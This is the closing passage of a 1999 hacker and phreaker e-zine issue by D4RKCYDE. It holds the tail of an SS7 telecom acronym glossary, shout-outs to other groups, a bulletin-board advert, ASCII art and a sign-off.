  SU       Signal Unit
  TCAP     Transaction Capabilities Application Part
  TFA      Transfer Allowed Message
  TFP      Transfer Prohibited Message
  TFR      Transfer Restricted Message

Well, that's it. Shouts to d4rkcyde, 9x, b4b0, eVolution, downt1me, elf, substance, lowtek, digiphreak, gr1p, t1p, euk. darkcyde.8m.com.

[----> ghost in the shell bbs <----]
[----> o11 +44 (o)1xxx xxxxxx <----]
[----> 24 hours. d4rkcyde (c) <----]

g1ts.login:

---(OOooOO)--------Outness----------------------------------------------(OOo-
---(OOooOO)-------------------------------------------------------------(OOo-
---(OOooOO)-------------------------------------------------------------(OOo-

Werd, that's it for this issue. Thanks to everyone who submitted shit, hopefully next issue we'll have even more :> Keep on c0nf1n, k33p drink1ng l04dz 0f c4fF3n3, be 3l337.

[C] 1999 D4RKCYDE Communications. darkcyde.8m.com #darkcyde EfNet.